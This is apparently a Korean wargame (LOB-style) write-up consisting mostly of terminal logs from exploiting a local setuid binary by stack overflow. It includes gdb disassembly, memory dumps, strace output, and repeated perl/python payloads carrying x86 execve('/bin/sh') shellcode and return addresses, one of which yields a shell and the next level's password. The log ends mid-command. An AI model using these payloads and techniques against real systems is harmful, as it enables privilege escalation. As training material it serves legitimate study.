cat로 stdin에 전달하는것은 우선 맞고, 그러고서 팝렛형께 strace쓰라고 힌트도 듣고 감도 잡아서 공격을 하는데 심지어 세그멘테이션 폴트도 안뜨더라고여. 음 뷴명히 48바이트를 넣었는데. 그리고 또 이상한건 그래서 쉘코드가 문제인가? 하고 풀이에 있는 쉘코드를 사용해보았습니다. (Sanguine형 쉘코드를 잠시 썼습니다) 로그를 봐봐요.
[nightmare@localhost nightmare]$ bash2
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28,"\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x01\x50\x01\x40"';cat)|./xavius
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28,"\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x01\x50\x01\x40"';cat)|./xavius
¸ù¿@P1P¸@PP@
ㅁㄴㅇ
/bin/sh: ㅁㄴㅇ: command not found
ㄹmy-pass
/bin/sh: ㄹmy-pass: command not found
my-pass
euid = 519
throw me away
q
/bin/sh: q: command not found
exit
exit
엔터를 치다보니 저렇게 되디다..? 그러고서 조금이따 다시 해보니까
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$
??
..라고 글을 쓰는 도중, 깨닫게 되었습니다..
"' ; cat)의 차이와 "';cat)의 차이를..
하....
아니 근데 그게 문제가 아닌거 같은데요 뭔가 포맷문제긴 하지만 띄어쓰기 문제인지는 모르겠슴다..?
근데 다른 쉘코드로는 안되네요. 왜그러지. 혹시 2f가 파이프로 전달되면 안들어가나요?
여튼 풀려서 좋네여! 처음봤을땐 매우 막막했는데 풀림
[nightmare@localhost nightmare]$ ./xerath
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc
Segmentation fault (core dumped)
[nightmare@localhost nightmare]$ gdb -q xerath core
Core was generated by `./xerath'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x40077f72 in memcmp () from /lib/libc.so.6
(gdb) ni
The program is not being run.
(gdb) list
1 memcmp: No such file or directory.
(gdb) x/wx 0x40077f72
0x40077f72 <memcmp+18>: 0x0474a6f3
(gdb) ls
Undefined command: "ls". Try "help".
(gdb) file x
xavius xavius.c xerath
(gdb) file xerath
Load new symbol table from "xerath"? (y or n) y
Reading symbols from xerath...done.
(gdb) disas main
Dump of assembler code for function main:
0x8048714 <main>: push %ebp
0x8048715 <main+1>: mov %esp,%ebp
0x8048717 <main+3>: sub $0x2c,%esp
0x804871a <main+6>: mov 0x8049a3c,%eax
0x804871f <main+11>: push %eax
0x8048720 <main+12>: push $0x100
0x8048725 <main+17>: lea 0xffffffd8(%ebp),%eax
0x8048728 <main+20>: push %eax
0x8048729 <main+21>: call 0x8048408 <fgets>
0x804872e <main+26>: add $0xc,%esp
0x8048731 <main+29>: lea 0xffffffd8(%ebp),%eax
0x8048734 <main+32>: push %eax
0x8048735 <main+33>: push $0x80488bb
0x804873a <main+38>: call 0x8048438 <printf>
0x804873f <main+43>: add $0x8,%esp
0x8048742 <main+46>: cmpb $0xbf,0x7(%ebp)
0x8048746 <main+50>: jne 0x8048760 <main+76>
0x8048748 <main+52>: push $0x80488bf
0x804874d <main+57>: call 0x8048438 <printf>
0x8048752 <main+62>: add $0x4,%esp
0x8048755 <main+65>: push $0x0
0x8048757 <main+67>: call 0x8048458 <exit>
0x804875c <main+72>: add $0x4,%esp
0x804875f <main+75>: nop
0x8048760 <main+76>: cmpb $0x8,0x7(%ebp)
0x8048764 <main+80>: jne 0x8048780 <main+108>
0x8048766 <main+82>: push $0x80488e0
0x804876b <main+87>: call 0x8048438 <printf>
0x8048770 <main+92>: add $0x4,%esp
0x8048773 <main+95>: push $0x0
0x8048775 <main+97>: call 0x8048458 <exit>
0x804877a <main+102>: add $0x4,%esp
0x804877d <main+105>: lea 0x0(%esi),%esi
0x8048780 <main+108>: push $0x4
0x8048782 <main+110>: lea 0xffffffd8(%ebp),%eax
0x8048785 <main+113>: lea 0x2c(%eax),%edx
---Type <return> to continue, or q <return> to quit---
0x8048788 <main+116>: push %edx
0x8048789 <main+117>: lea 0xffffffd4(%ebp),%eax
0x804878c <main+120>: push %eax
0x804878d <main+121>: call 0x8048448 <memcpy>
0x8048792 <main+126>: add $0xc,%esp
0x8048795 <main+129>: push $0x2
0x8048797 <main+131>: push $0x8048902
0x804879c <main+136>: mov 0xffffffd4(%ebp),%eax
0x804879f <main+139>: push %eax
0x80487a0 <main+140>: call 0x8048418 <memcmp>
0x80487a5 <main+145>: add $0xc,%esp
0x80487a8 <main+148>: mov %eax,%eax
0x80487aa <main+150>: test %eax,%eax
0x80487ac <main+152>: jne 0x80487b0 <main+156>
0x80487ae <main+154>: jmp 0x80487e0 <main+204>
0x80487b0 <main+156>: mov 0xffffffd4(%ebp),%eax
0x80487b3 <main+159>: cmpb $0xc9,(%eax)
0x80487b6 <main+162>: jne 0x80487d8 <main+196>
0x80487b8 <main+164>: mov 0xffffffd4(%ebp),%eax
0x80487bb <main+167>: inc %eax
0x80487bc <main+168>: cmpb $0xc3,(%eax)
0x80487bf <main+171>: jne 0x80487d8 <main+196>
0x80487c1 <main+173>: push $0x8048920
0x80487c6 <main+178>: call 0x8048438 <printf>
0x80487cb <main+183>: add $0x4,%esp
0x80487ce <main+186>: push $0x0
0x80487d0 <main+188>: call 0x8048458 <exit>
0x80487d5 <main+193>: add $0x4,%esp
0x80487d8 <main+196>: incl 0xffffffd4(%ebp)
0x80487db <main+199>: jmp 0x8048795 <main+129>
0x80487dd <main+201>: lea 0x0(%esi),%esi
0x80487e0 <main+204>: push $0x2c
0x80487e2 <main+206>: push $0x0
0x80487e4 <main+208>: lea 0xffffffd8(%ebp),%eax
0x80487e7 <main+211>: push %eax
0x80487e8 <main+212>: call 0x8048468 <memset>
0x80487ed <main+217>: add $0xc,%esp
---Type <return> to continue, or q <return> to quit---
0x80487f0 <main+220>: lea 0xffffffd8(%ebp),%eax
0x80487f3 <main+223>: mov $0xbfffffcf,%edx
0x80487f8 <main+228>: mov %edx,%ecx
0x80487fa <main+230>: sub %eax,%ecx
0x80487fc <main+232>: mov %ecx,%eax
0x80487fe <main+234>: push %eax
0x80487ff <main+235>: push $0x0
0x8048801 <main+237>: lea 0xffffffd8(%ebp),%eax
0x8048804 <main+240>: lea 0x30(%eax),%edx
0x8048807 <main+243>: push %edx
0x8048808 <main+244>: call 0x8048468 <memset>
0x804880d <main+249>: add $0xc,%esp
0x8048810 <main+252>: push $0xb90
0x8048815 <main+257>: push $0x0
0x8048817 <main+259>: lea 0xffffffd8(%ebp),%eax
0x804881a <main+262>: lea 0xfffff448(%eax),%edx
0x8048820 <main+268>: push %edx
0x8048821 <main+269>: call 0x8048468 <memset>
0x8048826 <main+274>: add $0xc,%esp
0x8048829 <main+277>: leave
0x804882a <main+278>: ret
0x804882b <main+279>: nop
0x804882c <main+280>: nop
0x804882d <main+281>: nop
0x804882e <main+282>: nop
0x804882f <main+283>: nop
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x804871a
(gdb) b *main+140
Breakpoint 2 at 0x80487a0
(gdb) b *main+277
Breakpoint 3 at 0x8048829
(gdb) r
Starting program: /home/nightmare/xerath
Breakpoint 1, 0x804871a in main ()
(gdb) c
Continuing.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc
Breakpoint 2, 0x80487a0 in main ()
(gdb) x/40wx $esp
0xbffffad0: 0x63636363 0x08048902 0x00000002 0x63636363
0xbffffae0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffaf0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffb00: 0x61616161 0x61616161 0x62626262 0x63636363
0xbffffb10: 0x0000000a 0xbffffb54 0xbffffb5c 0x40013868
0xbffffb20: 0x00000001 0x08048480 0x00000000 0x080484a1
0xbffffb30: 0x08048714 0x00000001 0xbffffb54 0x08048398
0xbffffb40: 0x0804885c 0x4000ae60 0xbffffb4c 0x40013e90
0xbffffb50: 0x00000001 0xbffffc4a 0x00000000 0xbffffc61
0xbffffb60: 0xbffffc83 0xbffffc8d 0xbffffc9b 0xbffffcba
(gdb) x/40wx $esp-80
0xbffffa80: 0x40010c27 0x40014680 0x00000007 0x4000a74e
0xbffffa90: 0x401081ec 0x4000ae60 0xbffffb54 0x40013ed0
0xbffffaa0: 0x080481f4 0x0804998c 0x0804827b 0x4001c5b0
0xbffffab0: 0xbffffb08 0x4000a970 0xbffffb0c 0x00000400
0xbffffac0: 0x4000ae60 0xbffffb54 0xbffffb08 0x08048792
0xbffffad0: 0x63636363 0x08048902 0x00000002 0x63636363
0xbffffae0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffaf0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffb00: 0x61616161 0x61616161 0x62626262 0x63636363
0xbffffb10: 0x0000000a 0xbffffb54 0xbffffb5c 0x40013868
(gdb)
0xbffffb20: 0x00000001 0x08048480 0x00000000 0x080484a1
0xbffffb30: 0x08048714 0x00000001 0xbffffb54 0x08048398
0xbffffb40: 0x0804885c 0x4000ae60 0xbffffb4c 0x40013e90
0xbffffb50: 0x00000001 0xbffffc4a 0x00000000 0xbffffc61
0xbffffb60: 0xbffffc83 0xbffffc8d 0xbffffc9b 0xbffffcba
0xbffffb70: 0xbffffccc 0xbffffce4 0xbffffd03 0xbffffd22
0xbffffb80: 0xbffffd2d 0xbffffd3b 0xbffffd80 0xbffffd95
0xbffffb90: 0xbffffdaa 0xbffffdba 0xbffffdc9 0xbffffdea
0xbffffba0: 0xbffffdf5 0xbffffe06 0xbffffe1a 0xbffffe22
0xbffffbb0: 0x00000000 0x00000003 0x08048034 0x00000004
(gdb)
0xbffffbc0: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffffbd0: 0x00001000 0x00000007 0x40000000 0x00000008
0xbffffbe0: 0x00000000 0x00000009 0x08048480 0x0000000b
0xbffffbf0: 0x00000206 0x0000000c 0x00000206 0x0000000d
0xbffffc00: 0x00000206 0x0000000e 0x00000206 0x00000010
0xbffffc10: 0x0fabfbff 0x0000000f 0xbffffc45 0x00000000
0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc40: 0x00000000 0x38366900 0x682f0036 0x2f656d6f
0xbffffc50: 0x6867696e 0x72616d74 0x65782f65 0x68746172
(gdb)
0xbffffc60: 0x53454c00 0x45504f53 0x2f7c3d4e 0x2f727375
0xbffffc70: 0x2f6e6962 0x7373656c 0x65706970 0x2068732e
0xbffffc80: 0x55007325 0x4e524553 0x3d454d41 0x53494800
0xbffffc90: 0x5a495354 0x30313d45 0x48003030 0x4e54534f
0xbffffca0: 0x3d454d41 0x61636f6c 0x736f686c 0x6f6c2e74
0xbffffcb0: 0x646c6163 0x69616d6f 0x4f4c006e 0x4d414e47
0xbffffcc0: 0x696e3d45 0x6d746867 0x00657261 0x4f4d4552
0xbffffcd0: 0x4f484554 0x313d5453 0x312e3239 0x312e3836
0xbffffce0: 0x00312e30 0x4c49414d 0x61762f3d 0x70732f72
0xbffffcf0: 0x2f6c6f6f 0x6c69616d 0x67696e2f 0x616d7468
(gdb)
0xbffffd00: 0x4d006572 0x54484341 0x3d455059 0x36383369
0xbffffd10: 0x6465722d 0x2d746168 0x756e696c 0x6e672d78
0xbffffd20: 0x45540075 0x783d4d52 0x6d726574 0x534f4800
0xbffffd30: 0x50595454 0x33693d45 0x50003638 0x3d485441
0xbffffd40: 0x7273752f 0x636f6c2f 0x622f6c61 0x2f3a6e69
0xbffffd50: 0x3a6e6962 0x7273752f 0x6e69622f 0x73752f3a
0xbffffd60: 0x31582f72 0x2f365231 0x3a6e6962 0x6d6f682f
0xbffffd70: 0x696e2f65 0x6d746867 0x2f657261 0x006e6962
0xbffffd80: 0x454d4f48 0x6f682f3d 0x6e2f656d 0x74686769
0xbffffd90: 0x6572616d 0x504e4900 0x43525455 0x74652f3d
(gdb)
0xbffffda0: 0x6e692f63 0x72747570 0x48530063 0x3d4c4c45
0xbffffdb0: 0x6e69622f 0x7361622f 0x53550068 0x6e3d5245
0xbffffdc0: 0x74686769 0x6572616d 0x53414200 0x4e455f48
0xbffffdd0: 0x682f3d56 0x2f656d6f 0x6867696e 0x72616d74
0xbffffde0: 0x622e2f65 0x72687361 0x414c0063 0x653d474e
0xbffffdf0: 0x53555f6e 0x54534f00 0x3d455059 0x756e696c
0xbffffe00: 0x6e672d78 0x57500075 0x682f3d44 0x2f656d6f
0xbffffe10: 0x6867696e 0x72616d74 0x48530065 0x3d4c564c
0xbffffe20: 0x534c0032 0x4c4f435f 0x3d53524f 0x303d6f6e
0xbffffe30: 0x69663a30 0x3a30303d 0x303d6964 0x34333b31
(gdb)
0xbffffe40: 0x3d6e6c3a 0x333b3130 0x69703a36 0x3b30343d
0xbffffe50: 0x733a3333 0x31303d6f 0x3a35333b 0x343d6462
0xbffffe60: 0x33333b30 0x3a31303b 0x343d6463 0x33333b30
0xbffffe70: 0x3a31303b 0x303d726f 0x35303b31 0x3b37333b
0xbffffe80: 0x6d3a3134 0x31303d69 0x3b35303b 0x343b3733
0xbffffe90: 0x78653a31 0x3b31303d 0x2a3a3233 0x646d632e
0xbffffea0: 0x3b31303d 0x2a3a3233 0x6578652e 0x3b31303d
0xbffffeb0: 0x2a3a3233 0x6d6f632e 0x3b31303d 0x2a3a3233
0xbffffec0: 0x6d74622e 0x3b31303d 0x2a3a3233 0x7461622e
0xbffffed0: 0x3b31303d 0x2a3a3233 0x3d68732e 0x333b3130
(gdb)
0xbffffee0: 0x2e2a3a32 0x3d687363 0x333b3130 0x2e2a3a32
0xbffffef0: 0x3d726174 0x333b3130 0x2e2a3a31 0x3d7a6774
0xbfffff00: 0x333b3130 0x2e2a3a31 0x3d6a7261 0x333b3130
0xbfffff10: 0x2e2a3a31 0x3d7a6174 0x333b3130 0x2e2a3a31
0xbfffff20: 0x3d687a6c 0x333b3130 0x2e2a3a31 0x3d70697a
0xbfffff30: 0x333b3130 0x2e2a3a31 0x31303d7a 0x3a31333b
0xbfffff40: 0x3d5a2e2a 0x333b3130 0x2e2a3a31 0x303d7a67
0xbfffff50: 0x31333b31 0x622e2a3a 0x303d327a 0x31333b31
0xbfffff60: 0x622e2a3a 0x31303d7a 0x3a31333b 0x7a742e2a
0xbfffff70: 0x3b31303d 0x2a3a3133 0x6d70722e 0x3b31303d
(gdb)
0xbfffff80: 0x2a3a3133 0x6970632e 0x31303d6f 0x3a31333b
0xbfffff90: 0x706a2e2a 0x31303d67 0x3a35333b 0x69672e2a
0xbfffffa0: 0x31303d66 0x3a35333b 0x6d622e2a 0x31303d70
0xbfffffb0: 0x3a35333b 0x62782e2a 0x31303d6d 0x3a35333b
0xbfffffc0: 0x70782e2a 0x31303d6d 0x3a35333b 0x6e702e2a
0xbfffffd0: 0x31303d67 0x3a35333b 0x69742e2a 0x31303d66
0xbfffffe0: 0x3a35333b 0x6f682f00 0x6e2f656d 0x74686769
0xbffffff0: 0x6572616d 0x7265782f 0x00687461 0x00000000
0xc0000000: Cannot access memory at address 0xc0000000
(gdb)
0xc0000004: Cannot access memory at address 0xc0000004
(gdb) x/40wx $esp-500
0xbffff8dc: 0x40029b0e 0xbffff9b0 0x400081e6 0x40029ad5
0xbffff8ec: 0x40029ad5 0x40013868 0x00000000 0x40000b4f
0xbffff8fc: 0x000015d5 0x000000bd 0x00000000 0x7f1c0300
0xbffff90c: 0x40000544 0x40029b0e 0xbffff9e4 0x400081e6
0xbffff91c: 0x40029ad5 0x40029ad5 0x40013868 0x400143e0
0xbffff92c: 0x00001839 0x4001c460 0x400145ec 0x06568b74
0xbffff93c: 0xbffff9c0 0x40023667 0x4001c460 0x400143e0
0xbffff94c: 0x00000001 0x00001840 0x40020ca0 0x400145e4
0xbffff95c: 0x00000000 0xbffff9e4 0x4001c5b0 0x00000184
0xbffff96c: 0x40021fd0 0x40001402 0xbffffa44 0x40008134
(gdb)
0xbffff97c: 0x40000ec9 0x40023713 0x40013868 0x400143e0
0xbffff98c: 0x00001743 0x40029b0e 0xbffffa64 0x400081e6
0xbffff99c: 0x40029ad5 0x40029ad5 0x40029b0e 0xbffffa78
0xbffff9ac: 0x400081e6 0x40029ad5 0x080482f2 0x40013868
0xbffff9bc: 0x40013ed0 0x00000027 0x0000001a 0x00000000
0xbffff9cc: 0x40000824 0x00007080 0x40013c00 0x00000003
0xbffff9dc: 0x00000000 0x00000003 0x40023809 0x00000708
0xbffff9ec: 0x40021fd0 0x08048264 0x400143e0 0x4001c5b0
0xbffff9fc: 0x00000184 0x40021fd0 0x4001ad70 0x400143e0
0xbffffa0c: 0x00000003 0x40014650 0x00000001 0xbffffa30
(gdb)
0xbffffa1c: 0x080481f4 0x400140d4 0x073c3a79 0xbffffaac
0xbffffa2c: 0x0804827b 0x4001c5b0 0x400143e0 0x400143e0
0xbffffa3c: 0xbffffae1 0x40015001 0xbffffa7c 0x4000a7fd
0xbffffa4c: 0x400143d0 0x400146b0 0x00000007 0x4000a74e
0xbffffa5c: 0x401081ec 0x401068c0 0xbffffa9c 0x4000a7fd
0xbffffa6c: 0x400143d0 0x400146b0 0x00000007 0xbffffab0
0xbffffa7c: 0x4000a7fd 0x40010c27 0x40014680 0x00000007
0xbffffa8c: 0x4000a74e 0x401081ec 0x4000ae60 0xbffffb54
0xbffffa9c: 0x40013ed0 0x080481f4 0x0804998c 0x0804827b
0xbffffaac: 0x4001c5b0 0xbffffb08 0x4000a970 0xbffffb0c
(gdb)
0xbffffabc: 0x00000400 0x4000ae60 0xbffffb54 0xbffffb08
0xbffffacc: 0x08048792 0x63636363 0x08048902 0x00000002
0xbffffadc: 0x63636363 0x61616161 0x61616161 0x61616161
0xbffffaec: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffafc: 0x61616161 0x61616161 0x61616161 0x62626262
0xbffffb0c: 0x63636363 0x0000000a 0xbffffb54 0xbffffb5c
0xbffffb1c: 0x40013868 0x00000001 0x08048480 0x00000000
0xbffffb2c: 0x080484a1 0x08048714 0x00000001 0xbffffb54
0xbffffb3c: 0x08048398 0x0804885c 0x4000ae60 0xbffffb4c
0xbffffb4c: 0x40013e90 0x00000001 0xbffffc4a 0x00000000
(gdb)
(gdb)
(gdb)
(gdb) q
The program is running. Exit anyway? (y or n) y
[nightmare@localhost nightmare]$ man2 execve
bash2: man2: command not found
[nightmare@localhost nightmare]$ man 2 execve
[nightmare@localhost nightmare]$ man 2 brk
[nightmare@localhost nightmare]$ man 2 old_mmap
No entry for old_mmap in section 2 of the manual
[nightmare@localhost nightmare]$ man old_mmap
No manual entry for old_mmap
[nightmare@localhost nightmare]$ man 2 oldmmap
No entry for oldmmap in section 2 of the manual
[nightmare@localhost nightmare]$ man 2 mmap
[nightmare@localhost nightmare]$ man 2 mmap
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ man 2 open
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ man 2 read
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ strace ./xerath
execve("./xerath", ["./xerath"], [/* 22 vars */]) = 0
brk(0) = 0x8049a58
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000
open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0
old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000
close(3) = 0
open("/lib/libc.so.6", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096
old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000
mprotect(0x40105000, 30812, PROT_NONE) = 0
old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000
old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000
close(3) = 0
mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0
mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0
munmap(0x40015000, 12210) = 0
personality(PER_LINUX) = 0
getpid() = 1230
fstat64(0, 0xbffff984) = -1 ENOSYS (Function not implemented)
fstat(0, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000
ioctl(0, TCGETS, {B9600 opost isig icanon echo ...}) = 0
read(0, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"..., 1024) = 49
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000
ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0
write(1, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"..., 49aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc
) = 49
write(1, "\n", 1
) = 1
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x5, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x16, "\x00\x50\x10\x40"';cat)|./xerath
j
XRh//shh/binRSÍ̀
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x5, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x16, "\x01\x50\x10\x40"';cat)|./xerath
j
XRh//shh/binRSÍ̀P@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"21, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x01\x50\x10\x40"';cat)|./xerath
Number found where operator expected at -e line 1, near ""\x90"21"
(Missing operator before 21?)
syntax error at -e line 1, near ""\x90"21"
Execution of -e aborted due to compilation errors.
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x21, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x01\x50\x10\x40"';cat)|./xerath
j
XRh//shh/binRSÍ̀P@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x5, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` ", "\x01\x50\x10\x40"';cat)|./xerath
>
>
>
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x5, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3", "\x01\x50\x10\x40"';cat)|./xerath
hÎh±
SThjohi0chi0tijYþ
IyúA÷TP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x2, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81", "\x01\x50\x10\x40"';cat)|./xerath
^1ɱ2l uöê 2Qi00tii0cjoQT⚱
P@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x200, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81", "\x01\x50\x10\x40"';cat)|./xerath
^1ɱ2l uöê 2Qi00tii0cjoQT⚱
P@
[nightmare@localhost nightmare]$ (perl -e 'print "\xe0\x8a\x05\x40", "AAAA", "BBBB", "\x01\x50\x10\x40"';cat)|./xerath
@AAAABBBBP@
[nightmare@localhost nightmare]$ vi foo.c
[nightmare@localhost nightmare]$ gcc foo.c -o foo
foo.c: In function `main':
foo.c:5: warning: assignment makes pointer from integer without a cast
[nightmare@localhost nightmare]$ ./foo
0x400fbff9
[nightmare@localhost nightmare]$ (perl -e 'print "\xe0\x8a\x05\x40", "AAAA", "f9\xbf\x0f\x40", "\x01\x50\x10\x40"';cat)|./xerath
@AAAAf9¿@P@
[nightmare@localhost nightmare]$ (perl -e 'print "\xe0\x8a\x05\x40", "AAAA", "\xf9\xbf\x0f\x40", "\x01\x50\x10\x40"';cat)|./xerath
@AAAAù¿@P@
[nightmare@localhost nightmare]$ (perl -e 'print "\xe0\x8a\x05\x40", "AAAA", "\xf9\xbf\x0f\x40", "\x90"x32, "\x01\x50\x10\x40"';cat)|./xerath
@AAAAù¿@P@
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ (perl -e 'print "a", "\xe0\x8a\x05\x40", "AAAA", "\xf9\xbf\x0f\x40", "\x90"x31, "\x01\x50\x10\x40"';cat)|./xerath
a@AAAAù¿@P@
[nightmare@localhost nightmare]$ ./serath
bash2: ./serath: No such file or directory
[nightmare@localhost nightmare]$ ./xerath
a\xe0\x8a\x05\x40AAAA\xf9\xbf\x0f\x40aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x01\x50\x10\x40
a\xe0\x8a\x05\x40AAAA\xf9\xbf\x0f\x40aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x01\x50\x10\x40
Segmentation fault (core dumped)
[nightmare@localhost nightmare]$ ./gdb -q core
bash2: ./gdb: No such file or directory
[nightmare@localhost nightmare]$ ./gdb -q -c core
bash2: ./gdb: No such file or directory
[nightmare@localhost nightmare]$ gdb -q -c core
Core was generated by `./xerath'.
Program terminated with signal 11, Segmentation fault.
#0 0x40077f72 in ?? ()
(gdb) x/40wx $esp
0xbffffad8: 0x4000ae60 0x080487a5 0x61616161 0x08048902
0xbffffae8: 0x00000002 0x61616161 0x65785c61 0x38785c30
0xbffffaf8: 0x30785c61 0x34785c35 0x41414130 0x66785c41
0xbffffb08: 0x62785c39 0x30785c66 0x34785c66 0x61616130
0xbffffb18: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffb28: 0x61616161 0x61616161 0x61616161 0x3130785c
0xbffffb38: 0x3035785c 0x3031785c 0x3034785c 0x0000000a
0xbffffb48: 0xbffffb64 0x08048398 0x0804885c 0x4000ae60
0xbffffb58: 0xbffffb5c 0x40013e90 0x00000001 0xbffffc5b
0xbffffb68: 0x00000000 0xbffffc64 0xbffffc78 0xbffffc90
(gdb) x/wx 0x40105000
0x40105000: 0x656e0073
(gdb) p read
No symbol table is loaded. Use the "file" command.
(gdb) file xerath
Reading symbols from xerath...done.
(gdb) b main
Breakpoint 1 at 0x804871a
(gdb) r
Starting program: /home/nightmare/xerath
Breakpoint 1, 0x804871a in main ()
(gdb) x/wx 0x40105000
0x40105000: 0x656e0073
(gdb) p read
$1 = {<text variable, no debug info>} 0x4000eec0 <__libc_read>
(gdb) q
The program is running. Exit anyway? (y or n) y
[nightmare@localhost nightmare]$ (python -c 'print "\x90"*27 + "\x68\xf9\xbf\x0f\x40\x68\xe0\x91\x03\x40\xb8\xe0\x8a\x05\x40\x50\xc3" + "\x01\x50\x01\x40"'; cat) | ./xavius
hù¿@h@¸@PP@
[nightmare@localhost nightmare]$ $(python -c 'print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" +
> "\x66\xfc\xff\xbf"') $(python -c 'print "\xe0\x8a\x05\x40" +
